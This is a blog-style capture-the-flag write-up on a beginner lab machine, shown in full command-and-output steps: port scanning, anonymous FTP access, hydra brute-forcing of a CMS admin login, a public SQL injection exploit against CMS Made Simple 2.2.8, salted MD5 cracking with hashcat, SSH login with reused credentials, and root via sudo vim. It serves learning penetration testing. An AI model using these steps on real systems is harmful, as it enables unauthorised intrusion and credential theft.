Simple CTF

Surya Dev Singh
11 min readNov 13, 2021

Beginner level ctf

✔️ INFORMATION GATHERING

rustscan :

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.74.102 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.74.102:80
Open 10.10.74.102:2222
Open 10.10.74.102:21
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 00:54 EST
Initiating Ping Scan at 00:54
Scanning 10.10.74.102 [4 ports]
Completed Ping Scan at 00:54, 0.50s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:54
Completed Parallel DNS resolution of 1 host. at 00:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 00:54
Scanning 10.10.74.102 [3 ports]
Discovered open port 2222/tcp on 10.10.74.102
Discovered open port 80/tcp on 10.10.74.102
Completed SYN Stealth Scan at 00:54, 7.64s elapsed (3 total ports)
Nmap scan report for 10.10.74.102
Host is up, received echo-reply ttl 61 (0.45s latency).
Scanned at 2021-11-10 00:54:15 EST for 8s
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
80/tcp open http syn-ack ttl 61
2222/tcp open EtherNetIP-1 syn-ack ttl 61
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
Raw packets sent: 11 (460B) | Rcvd: 3 (116B)

open ports :

  • 21 : FTP
  • 80: HTTP
  • 2222: EtherNetIp-1

nmap :

┌──(root💀kali)-[~]
└─# nmap 10.10.74.102 -sV -p80,21,2222
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 01:48 EST
Nmap scan report for 10.10.74.102
Host is up (0.39s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

ok , port 2222 is SSH
we will relay on nmap result !!

lets visit port 80

port 80

web server at port 80

lets view the source code

source code

nothing intresting at first
lets check for other service but before that , lets first run directory busting in background

┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 01:24:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.74.102/simple/]

===============================================================
2021/11/10 01:25:13 Finished
===============================================================

ok , lets visit /simple directory :

/simple
cms(cms made simple) framework version number

ok looks it looks like the site is made using some framwork cms made simple and it has the version 2.2.8

lets do a quick look up at searchsploit.

┌──(root💀kali)-[~]
└─# searchsploit "cms made simple 2.2.8"
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

ok there might be sql injeciton exploit for cms made simple
might get right exploit .
lets check if there is cve for that.

but before moving on to that , lets first enumerate other service as well

lets go to ftp , if we can login to it .

┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root):
530 This FTP server is anonymous only.
Login failed.
ftp>

the error message revel that we can login to ftp as anonymous user . so , lets login as anonymous.

┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.80 secs (0.2035 kB/s)
ftp>

and we were able to login as anaonymous and found a file called ForMitch.txt

lets open that file .

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
ForMitch.txt (END)

from the message it seems like we have one developer account called Mitch whose password is very weak

ok , we have not yet visited some directory from our result of nmap
so , lets first go to robots.txt

robots.txt

ok , we have got the right user name , i.e mike and we have also find one more directory /openemr-5_0_1_3

lets visit that

seems like we did’nt find anything. i think we need to run gobuster again on /simple directory

┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102/simple -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102/simple
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 02:00:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/admin (Status: 301) [Size: 319] [--> http://10.10.74.102/simple/admin/]
/assets (Status: 301) [Size: 320] [--> http://10.10.74.102/simple/assets/]
/doc (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/doc/]
/index.php (Status: 200) [Size: 19913]
/lib (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/lib/]
/modules (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/modules/]
/tmp (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/tmp/]
/uploads (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/uploads/]

===============================================================
2021/11/10 02:01:34 Finished
===============================================================

and there we are , we have got some directories.
i would be more intrested in visiting /admin first.

cms admin

its a login portal we have the user name mike

form our las enumeration , we have found that password for mike is easy so lets brute force it .

capturing the request
┌──(root💀kali)-[~]
└─# hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.190.16 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect" -t 50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 17:47:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://10.10.190.16:80/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect
[80][http-post-form] host: 10.10.190.16 login: mitch password: secret
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-10 17:47:40

well we got username and password for the login portal , but according to machine prespactive we need to find existing CVE and exploit that.

see if we can exploit the login page with the sql injecition we have found from
searchsploit. we can look for the same on internet.

lets copy the exploit to our home dirctory .

┌──(root💀kali)-[~]
└─# searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/46635.py

✔️ EXPLOITATION

i will rename to cms-sql-exploit.py
and now run our exploit

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
File "/root/cms-sql-exploit.py", line 25
print "[+] Specify an url target"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?

ok it seems like the program is made in python2 , we have python2 in our kali , but there would be some module problem , when we try to run the program. (python2 is dead)
will will be using 2to3 to convert our program to make it run using python3

2to3 -w cms-sql-exploit.py
  • w is for write changes.

now we can run our cms-sql-exploit.py

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py -u http://10.10.104.126/simple --crack -w /usr/share/wordlists/rockyou.txt

result i got :

[+] Salt for password found: 1dajXcz
[+] Username found: ji
[+] Email found: adv
[+] Password found: 0c01sf
[*] Try: 000000

i got false positive result.
i re-run the program again , but this this time have increase the time variable to 4 because it seems like the exploit is using time based sql injection if we increase the the time, it will look for if we didnt get response in 4 sec , then there might be sqli injection vector

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[*] Try: 0c01f4468bd75d7a84c7eb73846e8d96$
[*] Now try to crack password
Traceback (most recent call last):
File "/root/cms-sql-exploit.py", line 184, in <module>
crack_password()
File "/root/cms-sql-exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.9/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte

seems like we got some error , we can fix that error , but istead for doing that , we have found valid hash , seems like error is related to encoding .
by looking at hash , the first guest at the hash will be MD5

lets try to analyze the hash:

┌──(root💀kali)-[~]
└─# hashid
0c01f4468bd75d7a84c7eb73846e8d96
Analyzing '0c01f4468bd75d7a84c7eb73846e8d96'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x

hash-identifier

┌──(root💀kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0c01f4468bd75d7a84c7eb73846e8d96

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

we have MD5 hash and we also have salt.

A password salt is a random bit of data added to the password before it’s run through the hashing algorithm

we can look for module in hashcat which can crack md5 hash with salts

C:\Users\szero\Desktop\hashcat-6.2.4>hashcat.exe --help | findstr md5
70 | md5(utf16le($pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
hascat example

so i tried command :

hascat64.exe -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt

but i did’nt worked :{
so , tried to change it :

hacat64.exe -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt

this time it worked !!

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret

so , from the file we have found from the ftp , it says that Mitch uses same password for system user.
and we have already found that ssh port is open (remeber at port 2222) . so , we will try to login with these
credential .

mitch:secret

┌──(root💀kali)-[~]
└─# ssh mitch@10.10.24.159 -p 2222
The authenticity of host '[10.10.24.159]:2222 ([10.10.24.159]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.24.159]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.24.159's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ ls
user.txt
$ cd ..
$ ls
mitch sunbath

✔️ privilege escalation

manual enumeration:

-sh: 8: cd: can't cd to sunbath

finding suid binary own by root user

$ find / -type f -user root -perm /4000 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/fusermount
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
$

command we can run as sudo :

$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim

ok seems like we can run vim as sudo :

so, we can use exploit

sudo vim -c ':!/bin/sh'

source : gtfobins

$ sudo  vim -c ":!/bin/bash"root@Machine:/home#

and we got the root.the privesc part of these machine was easy !!

root@Machine:/# cd root/
root@Machine:/root# cat root.txt
*********************
root@Machine:/root#

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

you guys can subscibe me 🙌on youtube: i post walkthrought and other ethical hacking related videos there.

--

--

Surya Dev Singh

enthusiast cyber security learner and penetration tester / ethical hacker , python programmer and in my free time you will find me solving CTFs